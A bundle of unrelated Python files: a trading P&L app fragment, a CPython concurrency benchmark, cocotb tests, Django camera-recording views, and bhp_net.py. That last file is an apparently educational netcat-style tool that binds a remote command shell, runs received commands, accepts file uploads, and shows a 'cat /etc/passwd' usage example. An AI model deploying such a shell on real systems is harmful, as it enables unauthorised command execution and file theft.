(1 - self.current_pnl) * 100
self.apply_fees()
self.pnl_label.text = f'{self.current_pnl:.{self._PNL_PERC}f}%'
if self.current_pnl > 0:
self.pnl_label.color = get_color_from_hex(self._GREEN_HEX)
elif self.current_pnl < 0:
self.pnl_label.color = get_color_from_hex(self._RED_HEX)
else:
self.reset_pnl()
def update_symbol_label(self):
"""
Updates the entry price label
"""
self.symbol_label.text = self.current_symbol
def update_entry_label(self):
"""
Updates the entry price label
"""
precision = self.price_fetcher.get_symbol_precision(self.current_symbol)
self.entry_price_label.text = f'{self.entry_price:.{precision}f}'
def update_position_label(self):
"""
Updates current position label
"""
self.pos_str_label.text = self.position_mapping[self.current_position]
if self.current_position > 0:
self.pos_str_label.color = get_color_from_hex(self._GREEN_HEX)
elif self.current_position < 0:
self.pos_str_label.color = get_color_from_hex(self._RED_HEX)
else:
self.pos_str_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode else \
self._TEXT_COLOR_DARKMODE
def update_cum_pnl_label(self):
"""
Updates cumulative PNL label
"""
self.cum_pnl_label.text = f"{round(self.cumulative_pnl, 2)}%"
if self.cumulative_pnl > 0:
self.cum_pnl_label.color = get_color_from_hex(self._GREEN_HEX)
elif self.cumulative_pnl < 0:
self.cum_pnl_label.color = get_color_from_hex(self._RED_HEX)
else:
self.cum_pnl_label.color = self._TEXT_COLOR_LIGHTMODE if self.current_display_mode \
else self._TEXT_COLOR_DARKMODE
self.save_user_data()
if __name__ == "__main__":
app = MainApp()
app.run()
|
ccbench.py | # -*- coding: utf-8 -*-
# This file should be kept compatible with both Python 2.6 and Python >= 3.0.
from __future__ import division
from __future__ import print_function
"""
ccbench, a Python concurrency benchmark.
"""
import time
import os
import sys
import functools
import itertools
import threading
import subprocess
import socket
from optparse import OptionParser, SUPPRESS_HELP
import platform
# Compatibility
try:
xrange
except NameError:
xrange = range
try:
map = itertools.imap
except AttributeError:
pass
THROUGHPUT_DURATION = 2.0
LATENCY_PING_INTERVAL = 0.1
LATENCY_DURATION = 2.0
BANDWIDTH_PACKET_SIZE = 1024
BANDWIDTH_DURATION = 2.0
def task_pidigits():
"""Pi calculation (Python)"""
_map = map
_count = itertools.count
_islice = itertools.islice
def calc_ndigits(n):
# From http://shootout.alioth.debian.org/
def gen_x():
return _map(lambda k: (k, 4*k + 2, 0, 2*k + 1), _count(1))
def compose(a, b):
aq, ar, as_, at = a
bq, br, bs, bt = b
return (aq * bq,
aq * br + ar * bt,
as_ * bq + at * bs,
as_ * br + at * bt)
def extract(z, j):
q, r, s, t = z
return (q*j + r) // (s*j + t)
def pi_digits():
z = (1, 0, 0, 1)
x = gen_x()
while 1:
y = extract(z, 3)
while y != extract(z, 4):
z = compose(z, next(x))
y = extract(z, 3)
z = compose((10, -10*y, 0, 1), z)
yield y
return list(_islice(pi_digits(), n))
return calc_ndigits, (50, )
def task_regex():
"""regular expression (C)"""
# XXX this task gives horrendous latency results.
import re
# Taken from the `inspect` module
pat = re.compile(r'^(\s*def\s)|(.*(?<!\w)lambda(:|\s))|^(\s*@)', re.MULTILINE)
with open(__file__, "r") as f:
arg = f.read(2000)
def findall(s):
t = time.time()
try:
return pat.findall(s)
finally:
print(time.time() - t)
return pat.findall, (arg, )
def task_sort():
"""list sorting (C)"""
def list_sort(l):
l = l[::-1]
l.sort()
return list_sort, (list(range(1000)), )
def task_compress_zlib():
"""zlib compression (C)"""
import zlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 3
def compress(s):
zlib.decompress(zlib.compress(s, 5))
return compress, (arg, )
def task_compress_bz2():
"""bz2 compression (C)"""
import bz2
with open(__file__, "rb") as f:
arg = f.read(3000) * 2
def compress(s):
bz2.compress(s)
return compress, (arg, )
def task_hashing():
"""SHA1 hashing (C)"""
import hashlib
with open(__file__, "rb") as f:
arg = f.read(5000) * 30
def compute(s):
hashlib.sha1(s).digest()
return compute, (arg, )
throughput_tasks = [task_pidigits, task_regex]
for mod in 'bz2', 'hashlib':
try:
globals()[mod] = __import__(mod)
except ImportError:
globals()[mod] = None
# For whatever reasons, zlib gives irregular results, so we prefer bz2 or
# hashlib if available.
# (NOTE: hashlib releases the GIL from 4.0 and 3.1 onwards)
if bz2 is not None:
throughput_tasks.append(task_compress_bz2)
elif hashlib is not None:
throughput_tasks.append(task_hashing)
else:
throughput_tasks.append(task_compress_zlib)
latency_tasks = throughput_tasks
bandwidth_tasks = [task_pidigits]
class TimedLoop:
def __init__(self, func, args):
self.func = func
self.args = args
def __call__(self, start_time, min_duration, end_event, do_yield=False):
step = 20
niters = 0
duration = 0.0
_time = time.time
_sleep = time.sleep
_func = self.func
_args = self.args
t1 = start_time
while True:
for i in range(step):
_func(*_args)
t2 = _time()
# If another thread terminated, the current measurement is invalid
# => return the previous one.
if end_event:
return niters, duration
niters += step
duration = t2 - start_time
if duration >= min_duration:
end_event.append(None)
return niters, duration
if t2 - t1 < 0.01:
# Minimize interference of measurement on overall runtime
step = step * 3 // 2
elif do_yield:
# OS scheduling of Python threads is sometimes so bad that we
# have to force thread switching ourselves, otherwise we get
# completely useless results.
_sleep(0.0001)
t1 = t2
def run_throughput_test(func, args, nthreads):
assert nthreads >= 1
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
end_event = []
if nthreads == 1:
# Pure single-threaded performance, without any switching or
# synchronization overhead.
start_time = time.time()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=False))
return results
started = False
ready_cond = threading.Condition()
start_cond = threading.Condition()
ready = []
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
results.append(loop(start_time, THROUGHPUT_DURATION,
end_event, do_yield=True))
threads = []
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# We don't want measurements to include thread startup overhead,
# so we arrange for timing to start after all threads are ready.
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
with start_cond:
start_time = time.time()
started = True
start_cond.notify(nthreads)
for t in threads:
t.join()
return results
def run_throughput_tests(max_threads):
for task in throughput_tasks:
print(task.__doc__)
print()
func, args = task()
nthreads = 1
baseline_speed = None
while nthreads <= max_threads:
results = run_throughput_test(func, args, nthreads)
# Taking the max duration rather than average gives pessimistic
# results rather than optimistic.
speed = sum(r[0] for r in results) / max(r[1] for r in results)
print("threads=%d: %d" % (nthreads, speed), end="")
if baseline_speed is None:
print(" iterations/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
LAT_END = "END"
def _sendto(sock, s, addr):
sock.sendto(s.encode('ascii'), addr)
def _recv(sock, n):
return sock.recv(n).decode('ascii')
def latency_client(addr, nb_pings, interval):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
_time = time.time
_sleep = time.sleep
def _ping():
_sendto(sock, "%r\n" % _time(), addr)
# The first ping signals the parent process that we are ready.
_ping()
# We give the parent a bit of time to notice.
_sleep(1.0)
for i in range(nb_pings):
_sleep(interval)
_ping()
_sendto(sock, LAT_END + "\n", addr)
def run_latency_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--latclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_latency_test(func, args, nthreads):
# Create a listening socket to receive the pings. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
interval = LATENCY_PING_INTERVAL
duration = LATENCY_DURATION
nb_pings = int(duration / interval)
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first ping(s) to arrive before
# unblocking the background threads.
chunks = []
process = run_latency_client(addr=sock.getsockname(),
nb_pings=nb_pings, interval=interval)
s = _recv(sock, 4096)
_time = time.time
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
while LAT_END not in s:
s = _recv(sock, 4096)
t = _time()
chunks.append((t, s))
# Tell the background threads to stop.
end_event.append(None)
for t in threads:
t.join()
process.wait()
for recv_time, chunk in chunks:
# NOTE: it is assumed that a line sent by a client wasn't received
# in two chunks because the lines are very small.
for line in chunk.splitlines():
line = line.strip()
if line and line != LAT_END:
send_time = eval(line)
assert isinstance(send_time, float)
results.append((send_time, recv_time))
return results
def run_latency_tests(max_threads):
for task in latency_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
while nthreads <= max_threads:
results = run_latency_test(func, args, nthreads)
n = len(results)
# We print out milliseconds
lats = [1000 * (t2 - t1) for (t1, t2) in results]
#print(list(map(int, lats)))
avg = sum(lats) / n
dev = (sum((x - avg) ** 2 for x in lats) / n) ** 0.5
print("CPU threads=%d: %d ms. (std dev: %d ms.)" % (nthreads, avg, dev), end="")
print()
#print(" [... from %d samples]" % n)
nthreads += 1
print()
BW_END = "END"
def bandwidth_client(addr, packet_size, duration):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
local_addr = sock.getsockname()
_time = time.time
_sleep = time.sleep
def _send_chunk(msg):
_sendto(sock, ("%r#%s\n" % (local_addr, msg)).rjust(packet_size), addr)
# We give the parent some time to be ready.
_sleep(1.0)
try:
start_time = _time()
end_time = start_time + duration * 2.0
i = 0
while _time() < end_time:
_send_chunk(str(i))
s = _recv(sock, packet_size)
assert len(s) == packet_size
i += 1
_send_chunk(BW_END)
finally:
sock.close()
def run_bandwidth_client(**kwargs):
cmd_line = [sys.executable, '-E', os.path.abspath(__file__)]
cmd_line.extend(['--bwclient', repr(kwargs)])
return subprocess.Popen(cmd_line) #, stdin=subprocess.PIPE,
#stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
def run_bandwidth_test(func, args, nthreads):
# Create a listening socket to receive the packets. We use UDP which should
# be painlessly cross-platform.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("127.0.0.1", 0))
addr = sock.getsockname()
duration = BANDWIDTH_DURATION
packet_size = BANDWIDTH_PACKET_SIZE
results = []
threads = []
end_event = []
start_cond = threading.Condition()
started = False
if nthreads > 0:
# Warm up
func(*args)
results = []
loop = TimedLoop(func, args)
ready = []
ready_cond = threading.Condition()
def run():
with ready_cond:
ready.append(None)
ready_cond.notify()
with start_cond:
while not started:
start_cond.wait()
loop(start_time, duration * 1.5, end_event, do_yield=False)
for i in range(nthreads):
threads.append(threading.Thread(target=run))
for t in threads:
t.setDaemon(True)
t.start()
# Wait for threads to be ready
with ready_cond:
while len(ready) < nthreads:
ready_cond.wait()
# Run the client and wait for the first packet to arrive before
# unblocking the background threads.
process = run_bandwidth_client(addr=addr,
packet_size=packet_size,
duration=duration)
_time = time.time
# This will also wait for the parent to be ready
s = _recv(sock, packet_size)
remote_addr = eval(s.partition('#')[0])
with start_cond:
start_time = _time()
started = True
start_cond.notify(nthreads)
n = 0
first_time = None
while not end_event and BW_END not in s:
_sendto(sock, s, remote_addr)
s = _recv(sock, packet_size)
if first_time is None:
first_time = _time()
n += 1
end_time = _time()
end_event.append(None)
for t in threads:
t.join()
process.kill()
return (n - 1) / (end_time - first_time)
def run_bandwidth_tests(max_threads):
for task in bandwidth_tasks:
print("Background CPU task:", task.__doc__)
print()
func, args = task()
nthreads = 0
baseline_speed = None
while nthreads <= max_threads:
results = run_bandwidth_test(func, args, nthreads)
speed = results
#speed = len(results) * 1.0 / results[-1][0]
print("CPU threads=%d: %.1f" % (nthreads, speed), end="")
if baseline_speed is None:
print(" packets/s.")
baseline_speed = speed
else:
print(" ( %d %%)" % (speed / baseline_speed * 100))
nthreads += 1
print()
def main():
usage = "usage: %prog [-h|--help] [options]"
parser = OptionParser(usage=usage)
parser.add_option("-t", "--throughput",
action="store_true", dest="throughput", default=False,
help="run throughput tests")
parser.add_option("-l", "--latency",
action="store_true", dest="latency", default=False,
help="run latency tests")
parser.add_option("-b", "--bandwidth",
action="store_true", dest="bandwidth", default=False,
help="run I/O bandwidth tests")
parser.add_option("-i", "--interval",
action="store", type="int", dest="check_interval", default=None,
help="sys.setcheckinterval() value")
parser.add_option("-I", "--switch-interval",
action="store", type="float", dest="switch_interval", default=None,
help="sys.setswitchinterval() value")
parser.add_option("-n", "--num-threads",
action="store", type="int", dest="nthreads", default=4,
help="max number of threads in tests")
# Hidden option to run the pinging and bandwidth clients
parser.add_option("", "--latclient",
action="store", dest="latclient", default=None,
help=SUPPRESS_HELP)
parser.add_option("", "--bwclient",
action="store", dest="bwclient", default=None,
help=SUPPRESS_HELP)
options, args = parser.parse_args()
if args:
parser.error("unexpected arguments")
if options.latclient:
kwargs = eval(options.latclient)
latency_client(**kwargs)
return
if options.bwclient:
kwargs = eval(options.bwclient)
bandwidth_client(**kwargs)
return
if not options.throughput and not options.latency and not options.bandwidth:
options.throughput = options.latency = options.bandwidth = True
if options.check_interval:
sys.setcheckinterval(options.check_interval)
if options.switch_interval:
sys.setswitchinterval(options.switch_interval)
print("== %s %s (%s) ==" % (
platform.python_implementation(),
platform.python_version(),
platform.python_build()[0],
))
# Processor identification often has repeated spaces
cpu = ' '.join(platform.processor().split())
print("== %s %s on '%s' ==" % (
platform.machine(),
platform.system(),
cpu,
))
print()
if options.throughput:
print("--- Throughput ---")
print()
run_throughput_tests(options.nthreads)
if options.latency:
print("--- Latency ---")
print()
run_latency_tests(options.nthreads)
if options.bandwidth:
print("--- I/O bandwidth ---")
print()
run_bandwidth_tests(options.nthreads)
if __name__ == "__main__":
main()
|
test_external.py | # Copyright (c) 2013, 2018 Potential Ventures Ltd
# Copyright (c) 2013 SolarFlare Communications Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of Potential Ventures Ltd,
# SolarFlare Communications Inc nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL POTENTIAL VENTURES LTD BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
A set of tests that demonstrate cocotb functionality
Also used a regression test of cocotb capabilities
"""
import threading
import pytest
import cocotb
from cocotb.clock import Clock
from cocotb.decorators import external
from cocotb.triggers import ReadOnly, RisingEdge, Timer
from cocotb.utils import get_sim_time
def return_two(dut):
return 2
@cocotb.function
async def await_two_clock_edges(dut):
await RisingEdge(dut.clk)
await RisingEdge(dut.clk)
await Timer(1, units="ns")
dut._log.info("Returning from await_two_clock_edges")
return 2
def calls_cocotb_function(dut):
return await_two_clock_edges(dut)
def print_sim_time(dut, base_time):
# We are not calling out here so time should not advance
# And should also remain consistent
for _ in range(5):
_t = get_sim_time("ns")
dut._log.info("Time reported = %d", _t)
assert _t == base_time
dut._log.info("external function has ended")
@cocotb.test()
async def test_time_in_external(dut):
"""
Test that the simulation time does not advance if the wrapped external
routine does not call @function
"""
await Timer(10, units="ns")
time = get_sim_time("ns")
dut._log.info("Time at start of test = %d" % time)
for i in range(100):
dut._log.info("Loop call %d" % i)
await external(print_sim_time)(dut, time)
time_now = get_sim_time("ns")
await Timer(10, units="ns")
assert time == time_now
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_time_in_function(dut):
"""
Test that an @external function calling back into a cocotb @function
takes the expected amount of time
"""
@cocotb.function
def wait_cycles(dut, n):
for _ in range(n):
yield RisingEdge(dut.clk)
@external
def wait_cycles_wrapper(dut, n):
return wait_cycles(dut, n)
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
await Timer(10, units="ns")
for n in range(5):
for i in range(20):
await RisingEdge(dut.clk)
time = get_sim_time("ns")
expected_after = time + 100 * n
await wait_cycles_wrapper(dut, n)
time_after = get_sim_time("ns")
assert expected_after == time_after
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_external_call_return(dut):
"""
Test ability to await an external function that is not a coroutine using @external
"""
async def clock_monitor(dut):
count = 0
while True:
await RisingEdge(dut.clk)
await Timer(1000, units="ns")
count += 1
cocotb.start_soon(clock_monitor(dut))
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
value = await external(return_two)(dut)
assert value == 2
@cocotb.test()
async def test_consecutive_externals(dut):
"""
Test that multiple @external functions can be called in the same test
"""
value = await external(return_two)(dut)
dut._log.info("First one completed")
assert value == 2
value = await external(return_two)(dut)
dut._log.info("Second one completed")
assert value == 2
@cocotb.test()
async def test_external_from_readonly(dut):
"""
Test that @external functions that don't consume simulation time
can be called from ReadOnly state
"""
await ReadOnly()
dut._log.info("In readonly")
value = await external(return_two)(dut)
assert value == 2
@cocotb.test()
async def test_function_from_readonly(dut):
"""
Test that @external functions that call @functions that await Triggers
can be called from ReadOnly state
"""
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
await ReadOnly()
dut._log.info("In readonly")
value = await external(calls_cocotb_function)(dut)
assert value == 2
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_function_that_awaits(dut):
"""
Test that @external functions can call @function coroutines that
awaits Triggers and return values back through to
the test
"""
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
value = await external(calls_cocotb_function)(dut)
assert value == 2
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_await_after_function(dut):
"""
Test that awaiting a Trigger works after returning
from @external functions that call @functions that consume
simulation time
"""
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
value = await external(calls_cocotb_function)(dut)
assert value == 2
await Timer(10, units="ns")
await RisingEdge(dut.clk)
# Cadence simulators: "Unable set up RisingEdge(...) Trigger" with VHDL (see #1076)
@cocotb.test(
expect_error=cocotb.triggers.TriggerException
if cocotb.SIM_NAME.startswith(("xmsim", "ncsim")) and cocotb.LANGUAGE in ["vhdl"]
else ()
)
async def test_external_from_start_soon(dut):
"""
Test that @external functions work when awaited from a forked
task
"""
async def run_function(dut):
value = await external(calls_cocotb_function)(dut)
return value
async def run_external(dut):
value = await external(return_two)(dut)
return value
cocotb.start_soon(Clock(dut.clk, 100, units="ns").start())
coro1 = cocotb.start_soon(run_function(dut))
value = await coro1.join()
assert value == 2
dut._log.info("Back from join 1")
value = 0
coro2 = cocotb.start_soon(run_external(dut))
value = await coro2.join()
assert value == 2
dut._log.info("Back from join 2")
@cocotb.test()
async def test_external_raised_exception(dut):
"""
Test that exceptions thrown by @external functions can be caught
"""
@external
def func():
raise ValueError()
with pytest.raises(ValueError):
await func()
@cocotb.test()
async def test_external_returns_exception(dut):
"""
Test that exceptions can be returned by @external functions
"""
@external
def func():
return ValueError()
result = await func()
assert isinstance(result, ValueError)
@cocotb.test()
async def test_function_raised_exception(dut):
"""
Test that exceptions thrown by @function coroutines can be caught
"""
@cocotb.function
async def func():
raise ValueError()
@external
def ext():
return func()
with pytest.raises(ValueError):
await ext()
@cocotb.test()
async def test_function_returns_exception(dut):
"""
Test that exceptions can be returned by @function coroutines
"""
@cocotb.function
def gen_func():
return ValueError()
yield
@external
def ext():
return gen_func()
result = await ext()
assert isinstance(result, ValueError)
@cocotb.test()
async def test_function_from_weird_thread_fails(dut):
"""
Test that background threads caling a @function do not hang forever
"""
func_started = False
caller_resumed = False
raised = False
@cocotb.function
async def func():
nonlocal func_started
func_started = True
await Timer(10, units="ns")
def function_caller():
nonlocal raised
nonlocal caller_resumed
try:
func()
except RuntimeError:
raised = True
finally:
caller_resumed = True
@external
def ext():
t = threading.Thread(target=function_caller)
t.start()
t.join()
task = cocotb.start_soon(ext())
await Timer(20, units="ns")
assert caller_resumed, "Caller was never resumed"
assert not func_started, "Function should never have started"
assert raised, "No exception was raised to warn the user"
await task.join()
@cocotb.test()
async def test_function_called_in_parallel(dut):
"""
Test that the same `@function` can be called from two parallel background
threads.
"""
@cocotb.function
async def function(x):
await Timer(1, units="ns")
return x
@cocotb.external
def call_function(x):
return function(x)
t1 = cocotb.start_soon(call_function(1))
t2 = cocotb.start_soon(call_function(2))
v1 = await t1
v2 = await t2
assert v1 == 1, v1
assert v2 == 2, v2
|
views.py | from .models import Camera,Recording
from .serializers import RecordingSerializer,CameraSerializer
from django.views.decorators.csrf import csrf_exempt
from rest_framework.decorators import api_view
from rest_framework.response import Response
from .recorder import startRecording
import threading
import datetime,os
from django.conf import settings
'''This is the path of dir where all the recordings will be saved'''
PATH = os.path.join(settings.BASE_DIR,"allRecordings")
PATH = PATH.replace("\\","/")
'''function for starting recording from given camera'''
@api_view(['PUT'])
def start(request):
name=request.data.get('name',None)
if name is not None:
try:
camera = Camera.objects.get(name=name)
except:
return Response("camera not found")
check = CameraSerializer(camera)
if check.data.get("status"):
return Response({"Success":"Camera is already runnig"})
serializer = CameraSerializer(camera,data ={"status":True},partial=True)
if serializer.is_valid():
serializer.save()
date = str(str(datetime.datetime.now()).split()[0])
Time = "Time_"+str(str(datetime.datetime.now().hour))+"_Date_"+date
if addpath(name,Time):
t = threading.Thread(target=startRecording,args=(name,check.data.get("url"),str(Time)))
t.start()
return Response("{name} is Started".format(name=name))
else:
return Response("{name} is not Started".format(name=name))
return Response("{name} is Started".format(name=name))
else:
return Response({"error":serializer.errors})
else:
return Response("camera not found")
''' function for stopping recording from given camera'''
@api_view(['PUT'])
def stop(request):
name=request.data.get('name',None)
if name is not None:
try:
camera = Camera.objects.get(name=name)
except:
return Response("camera not found")
serializer = CameraSerializer(camera,data ={"status":False},partial=True)
if serializer.is_valid():
serializer.save()
return Response("{name} is Stopped".format(name=name))
else:
return Response({"error":serializer.errors})
else:
return Response("camera not found!")
'''function for retriving status of all/given camera'''
@api_view()
def health_check(request,Name=None):
if request.method =="GET":
pythondata = request.data
name = pythondata.get("name",None)
if Name and name is None:
name = Name
if name is not None and name!="all":
try:
camera = Camera.objects.get(name=name)
serializer = CameraSerializer(camera)
return Response(serializer.data)
except:
return Response("invalid request")
elif name=="all":
camera = Camera.objects.all()
serializer = CameraSerializer(camera,many=True)
return Response(serializer.data)
else:
return Response("invalid request")
'''function to store a list of camera urls to database for recording'''
@csrf_exempt
@api_view(['POST'])
def store_urls(request):
if request.method =="POST":
pythondata = request.data
urls = pythondata.get("urls",None)
if urls is not None:
for i in urls:
try:
camera = Camera.objects.get(name=i.get('name'))
res = {"Error":"Camera url is allready Present can't insert again"}
break
except:
serializer = CameraSerializer(data = i)
if serializer.is_valid():
serializer.save()
res = {"Success":"Camera urls are stored"}
else:
res = {"Error":serializer.errors}
else:
res = {"Error":"data not passed by you"}
return Response(res)
'''retrive all recordings from database'''
@api_view(['GET'])
def getpath(request):
if request.method =="GET":
recording = Recording.objects.all()
serializer = RecordingSerializer(recording,many=True)
return Response(serializer.data)
'''function for getting Valid and corrupted videos in dictonary formate'''
@api_view(['GET'])
def corrupt_checker(request):
if request.method =="GET":
res = dict()
recording = Recording.objects.filter(status="valid")
serializer = RecordingSerializer(recording,many=True)
res["Good Videos"] = serializer.data
recording = Recording.objects.filter(status="corrupt")
serializer = RecordingSerializer(recording,many=True)
res["Corrupted Videos"] = serializer.data
return Response(res)
'''this function is called only from start function . user can not call it direct'''
def addpath(name,Time):
filename = name+"_"+str(Time)
global PATH
data = {"name":filename,"path":PATH+"/"+filename+".avi","status":"valid","datetime":Time}
serializer = RecordingSerializer(data = data)
if serializer.is_valid():
serializer.save()
res = {"Success":"recording Set"}
print(res)
return True
else:
res = {"Error":serializer.errors}
return False
|
bhp_net.py | import sys
import socket
import getopt
import threading
import subprocess
#global var
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def run_command(cmd):
"""runs a command and return the output
"""
cmd = cmd.rstrip()
try:
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
except subprocess.CalledProcessError as e:
output = e.output
return output
#handling incoming client connections
def client_handler(client_socket):
global upload
global execute
global command
#check for upload availables
if len(upload_destination):
file_buffer = ""
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
try:
with open (upload_destination, "wb") as file_descriptor:
file_descriptor.write(file_buffer.encode("utf-8"))
client_socket.send(f"Successfully saved file to {upload_destination}")
except OSError as e:
client_socket.send(f"Failed to save file to {upload_destination} due to OS Error.\n Details: {e}")
#check for command execution
if len(execute):
output = run_command(execute)
client_socket.send(output)
#check if a command shell is requested
if command:
while True:
client_socket.send("<BHP:#>".encode("utf-8"))
#open to reception until we grab a linefeed (== enter key)
cmd_buffer = b""
while b"\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
#execute and send back results
response = run_command(cmd_buffer)
client_socket.send(response)
#let's work on incoming connections:
def server_loop():
global target
global port
#if target undefined we listen to all interfaces
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(target, port)
server.listen(5)
while True:
client_socket, addr = server.accept()
#thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
#if we are not listening, we are a client. Then:
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
client.connect((target, port))
#if we detect input from stdin, we'll send it, if not we keep waiting
if len(buffer):
client.send(buffer.encode("utf-8"))
while True:
recv_len = 1
response = b""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print(response.decode("utf-8"), end=" ")
#wait for further input and then send it off
buffer = input("")
buffer += "\n"
client.send(buffer.encode("utf-8"))
except socket.error as e:
print(f"[*] Exception caught. Exiting.")
print(f"[*] Details of error: {e}")
client.close()
#write the function that will print the instructions if an unknown input is intered
def usage_info():
print("Netcat Replacement")
print("")
print("Usage: bhp_net.py -t target_host -p port")
print("-l --listen - listen on [host]:[port] for incoming connections")
print("-e --execute=file_to_run - execute the given file upon receiving a connection")
print("-c --command - initialize a command shell")
print("-u --upload=destination - upon receiving a connection upload a file and write it to [destination]")
print("")
print("")
print("Examples:")
print("bhp_net.py -t 192.168.0.1 -p 555 -l -c")
print("bhp_net.py -t 192.168.0.1 -p 555 -l -u=c:\\target.exe")
print("bhp_net.py -t 192.168.0.1 -p 555 -l -e=\"cat /etc/passwd\"")
print("echo 'ABCDEFGHI' |./bhp_net.py -t 192.168.11.12 -p 135")
sys.exit()
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage_info()
#read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", ["help", "listen", "execute", "target", "port", "command", "upload"])
for o, a in opts:
if o in ("-h", "--help"):
usage_info()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled option"
except getopt.GetoptError as e:
print(str(e))
usage_info()
if not listen and len(target) and port >0:
#read the buffer from command line
#this is blockin, so if not sendin input, unlock with CTRL-D
buffer = sys.stdin.read()
#send the data off
client_sender(buffer)
if listen:
server_loop()
main()
|
loghandler_33.py | #
# Copy/pasted from the Python 3.3 standard library, and distributed
# under the Python Software Foundation License.
#
import logging
import threading
import Queue
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
